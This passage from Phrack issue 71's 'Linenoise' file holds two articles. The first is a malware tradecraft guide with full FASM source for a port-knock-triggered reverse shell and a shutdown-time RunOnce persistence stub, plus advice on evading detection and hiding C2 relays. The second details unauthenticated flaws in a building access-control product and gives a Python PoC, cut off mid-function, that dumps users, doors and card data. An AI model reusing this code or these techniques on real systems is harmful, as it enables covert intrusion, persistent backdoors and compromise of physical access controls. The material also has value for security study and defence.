Copy Link
Add to Bookmark
Report
Phrack Inc. Volume 16 Issue 71 File 03
==Phrack Inc.==
Volume 0x10, Issue 0x47, Phile #0x03 of 0x11
|=-----------------------------------------------------------------------=|
|=---------------------=[ L I N E N O I S E ]=---------------------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[ Phrack Staff ]=-----------------------------=|
|=-----------------------------------------------------------------------=|
Linenoise is a collection of artifacts that do not fit elsewhere.
Short papers, corrections, brain dumps, late papers, etc..... :))
Contents
1 - Practical tips and thoughts to improve your -- SWaNk
malware stealthiness and increase campaign
dwell time
2 - Bugs in Evolution Software Building -- evildaemond
Access Control software
3 - The Weaponization of Automation -- Xenon Hexafluoride
4 - Riding with the Chollimas: Our 100 day quest -- MauroEldritch
to profile a North Korean State-Sponsored
Threat Actor
5 - Master of Puppets - turning AV sandboxes -- Grzegorz Tworek
into a botnet
6 - Learning an ISA by force of will -- iximeow
|=-----------------------------------------------------------------------=|
|=-=[ 1 - Practical tips and thoughts to improve your malware ]=---------=|
|=-=[ stealthiness and increase campaign dwell time ]=---------=|
|=-----------------------------------------------------------------------=|
by SWaNk <contato@vectorcrow.com>
--[ Table of Contents
0. About the Author
1. Preamble and scope
2. Malware scene evolution
3. Definitions
3.1 Dwell time
3.2 Fudness
3.3 Windows messaging system
3.4 Port knocking
4. The devil is in the details
5. Avoid patterns, reinvent the wheel
6. To stage, or not to stage, that is the question...
7. Relays and multiple protocols
8. Port knocking + RAW SOCKETS = Stealth bind
9. Abusing Windows messaging system to install persistence
10. Final Words
11. References
--[ 0. About the Author
I tend to define myself as a malware enthusiast. I have been coding
malware since early 2k. My main skills are related to malware development
and reverse engineering. Always available to malware, coffee, and beer.
I made some public contributions to the malware scene:
+ LOLBAS Project - Different context, but the same technique published
at 29a issue 7
https://lolbas-project.github.io/lolbas/Libraries/Desk/
+ New way to startup files - ShellExecute InstallScreenSaver API
https://vxug.fakedoma.in/zines/29a/29a7/Articles/29A-7.030.txt
+ The Fake Entry Point Trick
https://github.com/vxunderground/VXUG-Papers/blob/main/
The%20Fake%20Entry%20Point%20Trick.txt
+ Mocoh Polymorphic Engine
https://github.com/vxunderground/VXUG-Papers/blob/main/
Mocoh%20Polymorphic%20Engine.asm
--[ 1. Preamble and scope
First of all, I need to praise and acknowledge the work done by the
coders of the past. I thank the virus coding community's pioneers, who
paved the way for knowledge dissemination without the lure of financial
gain. We have a debt to those who generously shared their Tactics,
Techniques, and Procedures (TTPs) in an era when the value lay solely in
advancing the art of coding elegant malware, not monetary rewards.
To them, I extend my gratitude.
This paper is not intended to be a comprehensive or definitive guide to
evasion tactics. Instead, it provides a collection of techniques, tips,
and reflections that I have found effective while conducting offensive
operations using malware to accomplish my engagement objectives. Think of
it as input ideas to stimulate the offensive mindset necessary for coding
solid malware.
Some TTPs presented in this document are related to Windows OS. However,
the main idea behind the TTP is holistic and can be applied to different
OS. I tried to make this document enjoyable for both new malware coders and
experienced ones (who are now a bit afk because they are leading teams).
The idea was to initially provide strategic content regarding offensive
malware operations and gradually move on to the technical stuff, delivering
code and TTPs (the fun part).
Since the world has changed and nobody shares novelties anymore, you may
be asking yourself why I'm putting effort into this paper and sharing it
for free. First, it is a way to keep the scene alive. Second, it is a way
to pay back the community. And my last and most important reason is that
I fucking miss the old times...
--[ 2. Malware scene evolution
Today's malware scene is global and intricately intertwined with the
cybersecurity industry. The community's behavior regarding sharing new
TTPs have changed because companies and governments legally hire people to
code and analyze malware. Therefore, new TTPs have financial value in this
market. While courses and certifications offer valuable insights that
reduce the learning course, they often provide outdated TTPs. Therefore,
in an industry where novel TTPs are both highly valuable and short-lived,
the unwillingness to share knowledge is understandable and a big trend.
This lack of knowledge sharing underscores the importance of initiatives
like this one. By pooling our collective wisdom and experiences, we can
bridge the gap between theory and practice, arming practitioners with the
tools they need to stay ahead of emerging threats. This small contribution
to a community thrives on collaboration and shared learning.
--[ 3. Definitions
This section will introduce some essential definitions in the context of
malware development. If you are familiar with them, skip to the next
section.
--[ 3.1 Dwell time
Dwell time in the context of cybersecurity "is the time between an
attacker's initial penetration of an organization's environment and the
point at which the organization finds out the attacker is there" [1]. It is
metric used by the defensive team to perceive if the defense is getting
better detecting threats.
--[ 3.2 Fudness
The concept of FUDness, or Fully UnDetectable, is the ultimate aspiration
for adversaries seeking to evade detection and maintain operational
stealth. A FUD malware means it was meticulously crafted to bypass
traditional security measures and avoid detection by defensive mechanisms
in a specific engagement.
FUDness is a state. You can be FUD now and be detected later. Therefore,
before engaging, you must be sure that your malware is FUD regarding the
target defense mechanisms. Achieving FUD normally requires innovative
techniques, obfuscation methods, and continuous adaptation to evade
evolving detection algorithms. You must understand and meticulously
analyze the behavior of security products to exploit weaknesses and blind
spots in detection mechanisms.
--[ 3.3 Windows messaging system
The Windows messaging system facilitates communication between different
parts of a Windows operating system's graphical user interface (GUI)
application. When a application needs to communicate with another (such as
when a button is clicked, or a window needs to be updated) it sends
messages.
In Section 9, our malware snippet will intercept specific System Shutdown
Messages [2] that indicate a system reboot/logoff/restart to install a
persistence that will exist in the system just before the shutdown and the
next login, reducing the detection window.
--[ 3.4 Port knocking
Port knocking is a technique used to enhance network security by
obscuring the existence of services running on a server. It involves
dynamically altering firewall rules to open network ports in response to a
sequence of connection attempts on predefined "knock" ports. Once the
correct sequence of "knocks" is detected, the firewall rules are modified
to allow temporary access to the desired service port. This technique helps
a lot to increase your dwell time.
--[ 4. The devil is in the details
As the old saying goes, "The devil is in the details," nowhere is this
more accurate than malware development. While the overarching goal may be
to infiltrate systems and evade detection, the meticulous attention to
detail, particularly in error handling, ultimately determines the success or
failure of an offensive campaign.
No matter how seemingly insignificant, errors can potentially betray the
presence of malware and undermine the entire operation. A single oversight,
a careless exception, can expose the carefully crafted piece of code and
alert defenders. Therefore, malware developers must adhere to a mantra of
precision and discretion, ensuring errors are handled with utmost care.
We can improve the dwell time by meticulously addressing mistakes behind
the scenes without alerting users or triggering defensive mechanisms. At
the end of the day, it is better to lose access to a network than be
spotted.
--[ 5. Avoid patterns, reinvent the wheel
By avoiding code reuse and third-party libraries, malware authors can
make it more difficult for detection engineers to create signatures,
detection rules, and strategies. In my experience, this posture helps a
lot.
For example, I recently engaged with a ransomware detection solution.
The solution tries to collect the key used by ransomwares hooking Windows
crypto APIs [3] parameters. The defensive hypothesis is that the malware
coder will use Windows Cryptography APIs to encode files. The
reinvent-the-wheel strategy was fundamental in this engagement. I usually
use native OS APIs when it is strictly necessary. Therefore, I coded all
the cryptographic functions in the ransomware. Thus, the solution wasn't
ready for this move, making it impossible to achieve the key recovery.
Every environment has its own unique set of security measures and
defenses. By reinventing the wheel and customizing malware for each target,
attackers can increase their chances of success by tailoring their tactics
to exploit specific vulnerabilities or weaknesses.
Reusing code can lead to attribution, as threat intelligence researchers
may identify similarities between malware samples or campaigns. By creating
unique malware from scratch, attackers can minimize the risk of attribution
and create more resilient, adaptable threats that are better equipped to
evade detection and bypass defenses.
--[ 6. To stage, or not to stage, that is the question...
Staged and non-staged malware refers to different approaches to executing
your malware.
Non-staged malware delivers the entire malicious payload in a single
stage without additional components or downloads. The payload is typically
included in the initial executable or file. They are simple to code and do
not require communication with remote servers. However, Non-staged malware
has more detection surface to be explored by security solutions, as the
entire payload and functionalities are present in the artifact, increasing
the likelihood of detection. Additionally, they tend to be less adaptable
to changes in the threat landscape, as updates and modifications require
changes to the entire payload. However, when dealing with specific
scenarios, we must use Non-staged malware.
Staged malware delivers the malicious payload in multiple stages, each
performing a specific function or task. Typically, the initial stage is a
lightweight loader or downloader that retrieves additional components or
payloads from different remote servers. They can be more challenging to
detect by security solutions, as the initial payload may be simple, almost
benign, or have a low detection rate, allowing it to bypass initial
security checks. Additionally, it offers greater flexibility and
adaptability, as attackers can update and modify the subsequent stages,
providing functionalities to the malware when convenient. For example, you
deliver your initial stage. No persistence and no fancy functionalities;
just download a shellcode and run it in the memory. The shellcode can
provide recon on the target to ensure you are in a safe environment. In
this case, you have the option to send the subsequent stages when you
identify low detection risk. The initial stages are trivial to code; you
can take risks. It differs from complex shellcodes and expensive exploits;
creating them takes a lot of time and money. In this case, you must make a
risk analysis regarding the target's defensive capabilities to decide if
the chances of detection are acceptable.
In summary, The choice between staged and non-staged malware depends on
the attacker's specific objectives and requirements, as well as the
targeted environment and defenses. I tend to choose staged malware when
possible because it offers the necessary compartmentation to protect
critical parts of the malware and provides more flexibility during the
engagement.
--[ 7. Relays and multiple protocols
One proven successful strategy is using a pool of intermediary relays to
protect the malware Command and Control (C2) infrastructure. It comprises
a pool of intermediary servers or relays that receive information in one
protocol and forward it using another.
Using different protocols to receive and send commands to the malware can
reduce the attribution and detection risks. Some security vendors collect
and sell massive sets of metadata about the IP traffic flowing across the
Internet (NetFlows [4]). A specific vendor promises 95% of the Internet
traffic flows. This data is interesting for supporting flow-based traffic
analysis to infer attribution. The idea here is to make the inference more
difficult by increasing the giant mass of data they need to process.
One key concept in NetFlow is the IP flow tuple, which uniquely
identifies individual flows of network traffic. The classic IP flow tuple
consists of source IP, destination IP, ports, protocol type, and quality
of service. We intend to deny the possibility of filtering the protocol
type to reduce data.
By receiving and transmitting data using different protocols (e.g., a
relay that receives data using TCP and forwards it to another relay using
UDP), we force the analysis to consider all protocol types, increasing the
amount of data to be analyzed. Filtering protocols will result in failure
to infer a relation among traffic flows. In the worst-case scenario, we
create difficulties, forcing the adversary to spend more computational
resources and probably time trying to attribute us.
Relay networks provide malware operators with a dynamic and resilient
infrastructure that can adapt to changes in the threat landscape. By
leveraging a pool of relays, malware can quickly switch between different
communication channels and protocols, making it challenging for defenders
to effectively track and block C&C traffic.
By utilizing relays located in different geographic regions, malware
operators can further obfuscate their C2 infrastructure and evade detection
by defenders. This geographical diversity makes it difficult for defenders
to pinpoint the origin of malicious traffic and identify the underlying
infrastructure supporting the malware campaign. Additionally, using a pool
of relays, where the same relay takes time to be used again, helps avoid
traffic patterns and provides extra compartmentation and attribution
resilience when installed in different countries regarding law enforcement
collaboration. The best scenario is when the countries don't have a good
international relationship, and you have two relays forwarding traffic
between those countries.
--[ 8. Port knocking + RAW SOCKETS = Stealth bind
As stated in 3.4, port knocking offers a powerful mechanism for enhancing
malware operations' stealthiness by concealing service ports, dynamically
controlling access to services, and customizing communication channels
based on predefined knock sequences.
Raw sockets, also known as raw packet sockets, are a type of network
socket that provides access to network protocols at a lower level than
traditional sockets. Unlike standard sockets, which handle communication at
the transport layer (e.g., TCP, UDP), raw sockets allow applications to
interact directly with the network layer (e.g., IP) and even lower,
bypassing some of the higher-level protocol stack. They are commonly used
for packet sniffing and network analysis purposes.
Applications can use raw sockets to capture incoming and outgoing network
packets and inspect their contents; we will exploit this functionality.
It's important to note that raw sockets typically require elevated
privileges to operate. Therefore, we use this technique when the target has
already been compromised, and you have gained admin privileges.
The strategy here is to code a malware that can sniff the network and,
depending on the sequence of the perceived traffic (port knock), the
malware reacts to it. In this example, we will use a simple reverse TCP
connection to the Source IP that triggered the port knock. This way, we can
"Listen" to connections without binding a port. Talk is cheap, show me the
code...
<------ start of code ------>
format pe console
entry start
include 'win32ax.inc'
struct IP_Header
iph_verlen db 0
iph_tos db 0
iph_len dw 0
iph_id dw 0
iph_offset dw 0
iph_ttl db 0
iph_proto db 0
iph_xsum dw 0
iph_src dd 0
iph_dest dd 0
ends
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
.data
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
s_wsa WSADATA
s_addr sockaddr_in
r_wsa WSADATA
r_addr sockaddr_in
s_sock dd ?
r_sock dd ?
flag dd 1
PORT = 8080
SIO_RCVALL = 0x98000001
IPPROTO_IP = 0x0
IPPROTO_TCP = 0x6
IPPROTO_ICMP = 0x1
sinfo STARTUPINFO
pinfo PROCESS_INFORMATION
align 16
buff IP_Header
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
.code
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
start:
invoke WSAStartup,0202h,s_wsa
invoke gethostname,buff,64
invoke gethostbyname,buff
mov eax,[eax+12]
mov eax,[eax]
mov eax,[eax]
mov [s_addr.sin_addr],eax
mov [s_addr.sin_port],0
mov [s_addr.sin_family],AF_INET
invoke socket,AF_INET,SOCK_RAW,IPPROTO_IP
mov [s_sock],eax
or eax,eax
jnz @f
jmp @exit
@@:
invoke bind,[s_sock],s_addr,16
or eax,eax
jz @f
jmp @exit
@@:
invoke ioctlsocket,[s_sock],SIO_RCVALL,flag ;Receive All Packet
or eax,eax
jz @sniff
jmp @exit
@sniff:
invoke recv,[s_sock],buff,512,0
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
; Here we check if the TTL is equal to 42.
; the Answer to the Ultimate Question of Life, The Universe, and
; Everything!!!
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
;is this ICMP?
xor ebx,ebx
mov bl,[buff.iph_proto]
cmp bl,IPPROTO_ICMP
jne @sniff
;ICMP, then put the packet TTL value in al
xor eax,eax
mov al,[buff.iph_ttl]
;TTL = 42?
cmp al,42d
je trigger
jmp @sniff
@exit:
invoke ExitProcess,0
trigger:
cinvoke printf,<'[*] KNOCK, KNOCK! TTL = %05d',13,10,0>,eax
@@:
;just a simple reverse TCP ahead, it will connect to the src IP
invoke WSAStartup,0202h,r_wsa
test eax,eax
jnz @exit
invoke WSASocketA,AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0,0
cmp eax,-1
jz @exit
mov [r_sock],eax
mov [r_addr.sin_family],AF_INET
invoke htons,PORT
mov [r_addr.sin_port],ax
invoke inet_ntoa,[buff.iph_src]
invoke gethostbyname,eax
mov eax,[eax+12]
mov eax,[eax]
mov eax,[eax]
mov [r_addr.sin_addr],eax
mov eax,[r_sock]
mov [sinfo.hStdInput],eax
mov [sinfo.hStdOutput],eax
mov [sinfo.hStdError],eax
mov dword [sinfo.cb],sizeof.STARTUPINFO
mov dword [sinfo.dwFlags],STARTF_USESHOWWINDOW+\
STARTF_USESTDHANDLES
invoke connect, [r_sock],r_addr,sizeof.sockaddr_in
cmp eax,0
jne @sniff
invoke CreateProcess,0, <"cmd.exe">,0,0,TRUE,0,0,0,\
sinfo,pinfo
invoke WaitForSingleObject,dword[pinfo.hProcess],-1
invoke Sleep,10000
jmp @b
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
section '.idata' import data readable
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
library kernel32,'kernel32.dll',\
user32,'user32.dll',\
wsock32,'wsock32.dll',\
msvcrt,'msvcrt.dll',\
ws2_32,'ws2_32.dll'
import msvcrt,\
printf,'printf',\
scanf,'scanf'
import ws2_32,\
WSACleanup,'WSACleanup',\
listen,'listen',\
accept,'accept',\
WSASocketA,'WSASocketA'
include 'api\kernel32.inc'
include 'api\user32.inc'
include 'api\wsock32.inc'
<------ end of code ------>
The code provided is written in FASM syntax (x86 for Windows). It sniff
the packets waiting for a specially crafted packet with a TTL (Time To
Live) value of 42 to his host. If the TTL value matches 42, it triggers
the execution of a reverse TCP shell to connect back to the source IP
address from which the TTL 42 packet was received.
Here's a breakdown of what the code does:
1. It sets up a raw socket (SOCK_RAW) to receive all IP packets.
2. It enables the socket to receive all packets calling ioctlsocket API
with the SIO_RCVALL flag. When SIO_RCVALL is enabled on a raw socket,
it receives all incoming packets on the associated network interface,
regardless of their destination IP address.
3. It enters a loop to sniff incoming packets. When a packet is received
It extracts the TTL value from the IP header. If the TTL value is 42,
it triggers the execution of a reverse TCP shell.
4. The reverse TCP shell connects back to the source IP address from
which the TTL 42 packet was received.
This example is using TTL on purpose... You have to change the trigger
to work in the real world because the TTL will change depending on the
hops quantity. No free lunch. You must understand how this
stuff works to use it properly.
It's important to note that detecting this malware in its dormant state
(sniffing) can be challenging for regular users and newbie forensics
analysts because tools used to perform traffic analysis like netstat,
System Informer, TCPView, Wireshark, and others cannot identify this
technique.
Another usage of sniffing is measuring the host's average traffic
regarding protocols and data volume. This can be useful when facing Data
Loss Protection (DLP) solutions. In that case, we must avoid exceeding the
protocol's traffic average volume while exfiltrating data.
Finally, this code is independent of third-party libs or frameworks like
Winpcap or .NET. This characteristic is desirable when coding malware
since compatibility is paramount most of the time.
--[ 9. Abusing Windows messaging system to install persistence
Windows GUI applications that use the Messages in the Windows messaging
system listen and send messages to interact with other applications, as
stated in section 3.3. Usually, a message is sent to specific windows
identified by their handles. However, there are cases where messages are
broadcasted to multiple windows or all windows in the system. For example,
a "WM_SYSCOMMAND" message [5] with the "SC_MONITORPOWER" parameter (wParam)
is usually sent to all top-level windows using the handle HWND_BROADCAST
[6]. This way, all windows receive a message informing that the system is
entering a power-saving state, such as when the monitor is about to be
turned off. This normal behavior can be abused to start malicious routines
when the application perceives specific messages.
We will abuse system shutdown messages to install persistence in the
system. This approach's advantage is that the persistence will only exist
seconds after a logoff, reboot, or shutdown command and the startup.
In the example code provided, we install the persistence in the registry
at HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce. The
RunOnce key is used to specify programs that should be run once,
automatically, when Windows starts up. Unlike the Run key, which specifies
programs to run every time Windows starts, the RunOnce key is designed for
one-time execution of programs or commands. Once run, then the system
automatically deletes the key.
The issue occurs when the machine resets non-gracefully, like a BSOD or a
hard reset. In this case, we will lose the system's persistence. On the
other hand, this TTP has a short exposure time, so using forensics tools to
search for persistence will be ineffective. If the risk of losing access is
not acceptable, you should use another technique or a backup persistence.
The code is self-explanatory. We will monitor the messages
WM_QUERYENDSESSION (when the user chooses to end the session or when an
application calls one of the system shutdown functions), WM_ENDSESSION
(informs the application whether the session is ending), and
WM_POWERBROADCAST with lParam PBT_APMSUSPEND (the computer is about to
enter a suspended state). If the application finds one of them, we
install the persistence in the registry. Simple as that.
<------ start of code ------>
format PE64 GUI 5.0
entry start
include 'win64ax.inc'
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
section '.text' code readable executable
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
start:
sub rsp,8
invoke MessageBoxA,0 ,'survived bitches!', 'SWaNk 2024', 40h
invoke GetModuleHandle,0
mov [wc.hInstance],rax
invoke LoadIcon,0,IDI_APPLICATION
mov [wc.hIcon],rax
mov [wc.hIconSm],rax
invoke LoadCursor,0,IDC_ARROW
mov [wc.hCursor],rax
invoke RegisterClassEx,wc
test rax,rax
jz exit
invoke CreateWindowEx,WS_EX_TOOLWINDOW or WS_EX_TOPMOST,_class,\
_title,WS_SYSMENU+WS_DLGFRAME,128,128,256,192,NULL,NULL,\
[wc.hInstance],NULL
test rax,rax
jz exit
msg_loop:
invoke GetMessage,msg,NULL,0,0
cmp eax,1
jb exit
jne msg_loop
invoke TranslateMessage,msg
invoke DispatchMessage,msg
jmp msg_loop
exit:
invoke ExitProcess,[msg.wParam]
proc WindowProc uses rbx rsi rdi, hwnd,wmsg,wparam,lparam
cmp edx,WM_QUERYENDSESSION
je .wmqueryendsession
cmp edx,WM_POWERBROADCAST
je .wmpowerbroadcast
cmp edx,WM_ENDSESSION
je .wmqueryendsession
cmp edx,WM_DESTROY
je .wmdestroy
.defwndproc:
invoke DefWindowProc,rcx,rdx,r8,r9
jmp .finish
.wmpowerbroadcast:
cmp r9d, 0x80000000
jne .finish
.wmqueryendsession:
invoke RegCreateKeyExA, HKEY_CURRENT_USER,AutoKey,NULL,NULL,\
NULL,KEY_ALL_ACCESS,NULL,hkey,NULL
cmp rax,0
jne exit
invoke GetModuleFileName,NULL,szFile,256
cmp rax,0
je exit
invoke lstrlen,szFile
cmp rax,0
jbe exit
invoke RegSetValueExA,[hkey],ValueName,NULL,REG_SZ,szFile,eax
cmp rax,0
jne exit
invoke RegCloseKey,[hkey]
jmp .finish
.wmdestroy:
invoke PostQuitMessage,0
xor eax,eax
.finish:
ret
endp
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
section '.data' data readable writeable
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
AutoKey db 'Software\Microsoft\Windows\CurrentVersion\RunOnce',0
ValueName db 'EvilMalware',0
hkey dd ?
szFile dd ?
_title TCHAR 'title',0
_class TCHAR 'class',0
wc WNDCLASSEX sizeof.WNDCLASSEX,0,WindowProc,0,0,NULL,NULL,NULL,\
COLOR_BTNFACE+1,NULL,_class,NULL
msg MSG
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
section '.idata' import data readable writeable
;%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
library kernel32,'KERNEL32.DLL',\
user32,'USER32.DLL',\
advapi32,'ADVAPI32.DLL'
include 'api\kernel32.inc'
include 'api\user32.inc'
include 'api\advapi32.inc'
<------ end of code ------>
--[ 10. Final Words
"Quem refresca cu de pato eh lagoa [<o>]" VX Forever!
--[ 11. References
[1] Why The Dwell Time Of Cyberattacks Has Not Changed (2021)
https://www.forbes.com/sites/forbestechcouncil/2021/05/03/
why-the-dwell-time-of-cyberattacks-has-not-changed/?sh=e32b93b457d8
[2] System Shutdown Messages (2021)
https://learn.microsoft.com/en-us/windows/win32/shutdown/
system-shutdown-messages
[3] Cryptography Functions (2021)
https://learn.microsoft.com/en-us/windows/win32/seccrypto/
cryptography-functions?source=recommendations
[4] RFC 3954 NetFlow Version 9 (2004)
https://www.ietf.org/rfc/rfc3954.txt
[5] WM_SYSCOMMAND message
https://learn.microsoft.com/en-us/windows/win32/menurc/wm-syscommand
[6] SendMessage function (winuser.h)
https://learn.microsoft.com/en-us/windows/win32/api/winuser/
nf-winuser-sendmessage
|=-----------------------------------------------------------------------=|
|=-=[ 2 - Bugs in Evolution Software Building Access Control software ]=-=|
|=-----------------------------------------------------------------------=|
by evildaemond
Evolution Software is a wild piece of software, used for access control
systems in buildings in Australia. The software has been out since the
2000s and still gets updates (Last update March 30th 2024 at time of this
writing). One of the wild parts of this software is the web interface. If
you enable this web interface, you get one of the most poorly optimised
webpages you've ever seen, and some of the worst security I've witnessed.
This thing is like a CTF, and it's harder to not find vulnerabilities than
to find them.
Here are some highlights:
1. Trigger a full application crash
GET /DAL_ADD?' HTTP/1.1
2. Add a user to the system
Just add a user to the system, no authentication needed, and if you
chose operator_id as 0, it won't appear in the user creation logs or
show when they were created
POST /USER_CHANGE HTTP/1.1
...
user_operator_id=0&user_id=0&user_name=JamesSmith&1=on&loc_form_user_
card_imptrinted=0&loc_form_user_als_sitecode=1&loc_form_user_als_sitec
ode_new=1&loc_form_user_card=1&loc_form_user_data1=&loc_form_user_data2
=&command=
3. Get any users card data (FC and CN)
POST /DESKTOP_EDIT_USER_GET_CARD_FIELDS HTTP/1.1
...
1
2
get_code
4. PoC
Below is a poorly written Python PoC chatGPT wrote for it, if you want to
hide it in the next edition somewhere feel free to
import requests
import argparse
import re
from bs4 import BeautifulSoup
def application_crash(host, port):
try:
url = f"http://{host}:{port}/DAL_ADD?'"
response = requests.get(url)
response.close()
# In case of any response, return it for information purposes
return 'Request Sent'
except:
return 'Request Sent'
def request_all_users(host, port):
url = f'http://{host}:{port}/ID1_Users'
headers = {
'Host': host,
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) \
Gecko/20100101 Firefox/66.0",
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,\
image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Accept-Encoding': 'gzip, deflate, br',
"Connection": "keep-alive"
}
response = requests.get(url, headers=headers)
response.close()
soup = BeautifulSoup(response.text, 'html.parser')
# Check for session expiration or not logged in error response
script_tag = soup.find('script', string='opener.location="UnLoggedPage.html"')
if script_tag:
return "Error: Session appears to have expired, or user not logged in."
# Check if the expected user table exists
table = soup.find("table", {"id": "Users"})
if table:
users = []
for row in table.find_all("tr")[1:]: # skipping first row as it's a header
cols = row.find_all("td")
user_id = cols[0]['id']
user_name = cols[0].text.strip()
users.append((user_id, user_name))
output = "\n\nUsers in System\n|ID|Name|\n|---|---|"
for user in users:
output += f"\n|{user[0]}|{user[1]}|"
return output
else:
return "Error: Could not find the expected user table in the response."
def return_last_scanned_card(host, port):
url = f'http://{host}:{port}/DESKTOP_EDIT_USER_GET_CARD'
headers = {
'Host': host,
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) \
Gecko/20100101 Firefox/66.0",
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,\
image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Accept-Encoding': 'gzip, deflate, br',
"Connection": "keep-alive"
}
response = requests.post(url, headers=headers)
response.close()
# Assuming the response body contains the values in the order described.
lines = response.text.strip().split('\n')
if lines[0] == 'true':
hex_value = lines[1]
site_code = lines[2]
card_number = lines[3]
output = "\n|Site Code/Facility Number|Card Number|Hex|\n|---|---|---|\n"
output += f"|{site_code}|{card_number}|{hex_value}|"
return output
else:
return "\nNo last scanned card found, either a registered reader \
has not been configured, or no cards have been swiped in \
since it was last requested"
def request_all_doors(host, port):
url = f'http://{host}:{port}/ID1_Device%20Doors'
headers = {
'Host': host,
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) \
Gecko/20100101 Firefox/66.0",
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,\
image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Accept-Encoding': 'gzip, deflate, br',
"Connection": "keep-alive"
}
response = requests.get(url, headers=headers)
response.close()
soup = BeautifulSoup(response.text, 'html.parser')
# Check for session expiration or not logged in error response
script_tag = soup.find('script', string='opener.location="UnLoggedPage.html"')
if script_tag:
return "Error: Session appears to have expired, or user is not logged in."
# Check if the holContainer table exists
hol_container = soup.find("table", {"id": "HolContainer"})
if hol_container:
rows = hol_container.find_all('tr', class_='CellsInDiv')
doors = []
for row in rows:
door_id = row['id']
cols = row.find_all('td')
location = cols[0].text.strip()
name = cols[1].text.strip()
doors.append((door_id, location, name))
output = "\n\nDoors on System\n|ID|Location|Name|\n|---|---|---|"
for door in doors:
output += f"\n|{door[0]}|{door[1]}|{door[2]}|"
return output
else:
return "Error: Could not find the expected doors table in the response."
def retrieve_site_name(host, port):
url = f'http://{host}:{port}/desktop'
headers = {
'Host': host,
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) \
Gecko/20100101 Firefox/66.0",
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,\
image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Accept-Encoding': 'gzip, deflate, br',
"Connection": "keep-alive"
}
response = requests.get(url, headers=headers)
response.close()
soup = BeautifulSoup(response.text, 'html.parser')
title = soup.title.string # Extract the content inside the <title> tag
return f"Site Name: {title}"
def retrieve_company_fields(host, port):
url = f'http://{host}:{port}/ID_USER_GET_DATA_1'
headers = {
'Host': host,
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) \
Gecko/20100101 Firefox/66.0",
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,\
image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Accept-Encoding': 'gzip, deflate, br',
"Connection": "keep-alive"
}
response = requests.post(url, headers=headers)
response.close()
lines = response.text.strip().split('\n')
if lines[0] == 'true':
company_names = lines[1:]
output = "\n|Index|Company Name|"
for index, name in enumerate(company_names):
output += f"\n|{index}|{name}|"
return output
else:
return f"\nNo company names found"
def get_operator_names(host, port):
url = f'http://{host}:{port}/desktop_login.html'
headers = {
'Host': host,
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) \
Gecko/20100101 Firefox/66.0",
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,\
image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Accept-Encoding': 'gzip, deflate, br',
"Connection": "keep-alive"
}
response = requests.get(url, headers=headers)
response.close()
soup = BeautifulSoup(response.text, 'html.parser')
select_elem = soup.find('select', {'id': 'operatorname'})
if not select_elem:
return "Error: Could not find the expected select element in the response."
options = select_elem.find_all('option')
markdown_table = "| ID | Username |\n|----|----------|\n"
for option in options:
markdown_table += f"| {option['value']} | {option.text} |\n"
return markdown_table
def get_users(host, port):
url = f'http://{host}:{port}/MOBILE_GET_USERS_LIST'
headers = {
'Host': host,
'Connection': 'close'
}
current_index1 = 1
current_index2 = 1
collected_users = {}
max_same_responses = 75
